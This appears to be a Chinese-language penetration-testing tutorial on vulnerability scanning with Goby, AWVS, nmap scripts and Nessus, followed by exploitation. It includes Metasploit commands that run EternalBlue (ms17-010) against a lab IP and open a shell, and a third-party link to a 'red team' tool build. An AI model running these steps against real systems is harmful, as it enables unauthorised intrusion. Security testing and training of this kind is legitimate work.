一、漏洞扫描
1、Goby+AWVS漏洞扫描
goby和AWVS简介
Goby是针对目标企业梳理最全面的工具,同构goby可以清晰的扫描出ip地址开放的端口,以及端口对应的服务,于此同时会根据开放的端口及应用进行实战化的测试,并不在乎他的中低危害漏洞,而更在乎的是它能直接get shell的漏洞
AWVS是针对web的轻量级的漏洞扫描工具。也就是根据我们提供的被扫描地址,快速的扫描出其所有的漏洞,包含高中低及信息泄露等漏洞。
前戏
下载goby和awvs
(建议下载红队专版,更强大)
goby下载awvs的插件
将awvs的api添加到goby中
下载npcap
红队专版goby下载链接:https://pan.baidu.com/s/1hkUDJzz8iT_WAngV1K-pXw?pwd=8hgd
提取码:8hgd
在goby中输入ip或者域名开始扫描
一般是直接将子域名爆破出来,直接全部加进去
扫描结束后点击右边【Web检测】
左侧漏洞直接查看goby扫描出来的漏洞
其实一般这个就够用了
点击awvs按钮
awvs页面看到正在扫描
goby页面生成模板
2、nmap
需要常更新namp:
windows:https://nmap.org/download.html#windows
kali:执行命令sudo apt-get install nmap
下载vulscan
windows:
访问https://github.com/scipag/vulscan,下载并放进Nmap\scripts\vulscan*
linux:
git clone https://github.com/scipag/vulscan scipag_vulscan
ln -s pwd
/scipag_vulscan /usr/share/nmap/scripts/vulscan
也可以之间下到windows中然后转移到kali里面/usr/share/nmap/scripts/里面
更新漏洞库:
将下列文件下载下来放进/vulscan/文件夹中
https://www.computec.ch/projekte/vulscan/download/cve.csv
https://www.computec.ch/projekte/vulscan/download/exploitdb.csv
https://www.computec.ch/projekte/vulscan/download/openvas.csv
https://www.computec.ch/projekte/vulscan/download/osvdb.csv
https://www.computec.ch/projekte/vulscan/download/scipvuldb.csv
https://www.computec.ch/projekte/vulscan/download/securityfocus.csv
https://www.computec.ch/projekte/vulscan/download/securitytracker.csv
https://www.computec.ch/projekte/vulscan/download/xforce.csv
下载nmap-vulners
windows:
访问https://github.com/vulnersCom/nmap-vulners,下载并放进nmap\scripts\nmap-vulners*
linux:
cd /usr/share/nmap/scripts/
git clone https://github.com/vulnersCom/nmap-vulners.git
也可以之间下到windows中然后转移到kali里面/usr/share/nmap/scripts/里面
运行使用
使用vulscan扫描(推荐):nmap -sV --script=vulscan/vulscan.nse 192.168.242.137
(好像windows更多)
使用nmap-vulners扫描:nmap -sV --script=nmap-vulners/vulners.nse 192.168.242.137
3、Nessus
下载参考链接:
windows:https://blog.csdn.net/weixin_41924764/article/details/109550459
(我使用的10.6.1版本,完成下面“利用管理员权限更新Nessus漏洞库”等以后就可以了,不需要后续)
linux以及所有使用详细说明:https://blog.csdn.net/wwl012345/article/details/96998187
和:https://blog.csdn.net/Innocence_0/article/details/131654450
记一个遇到的问题:浏览器打不开
解决方法:调整键盘为英文输入状态,点击页面内的刷新按钮,刷新一下页面,然后用鼠标点击一下当前页面任意位置,紧接着在当前页面使用键盘直接输入:thisisunsafe 即可(不是在地址栏输入,就直接敲键盘就行了)。
使用:
New Scan
Basic Network Scan
Basic Network Scan为简易的扫描,一般用这个就够了。
Advanced Scan为在不使用任何建议的情况下配置扫描。
配置基础信息settings
配置账号密码
如果网站有账号密码,需要配置Credentials
选择插件plugins
保存save
点击">"进行扫描
二、漏洞利用
1、MSF(Metasploit Framework)
MSF是一款kali自带漏洞利用及攻击程序,含有三大模块:
msfconsole:最常用的利用模块
msweb:是MSF的图形化接口
msfupdate:用于MSF的更新,建议使用前先更新
(以永恒之蓝为例):
运行:msfconsole
查找漏洞:search ms17-010
利用:use exploit/windows/smb/ms17_010_eternalblue
查看所需payload:show options
设置payload:set RHOSTS 192.168.242.137
开始攻击:run
反弹shell:shell
2、浏览器直接搜索
如CVE-2008-4250
3、查看漏洞公布平台
https://www.cnvd.org.cn/
https://www.seebug.org/
https://fr.0day.today/
https://www.exploit-db.com/
https://packetstormsecurity.com/
等等。。。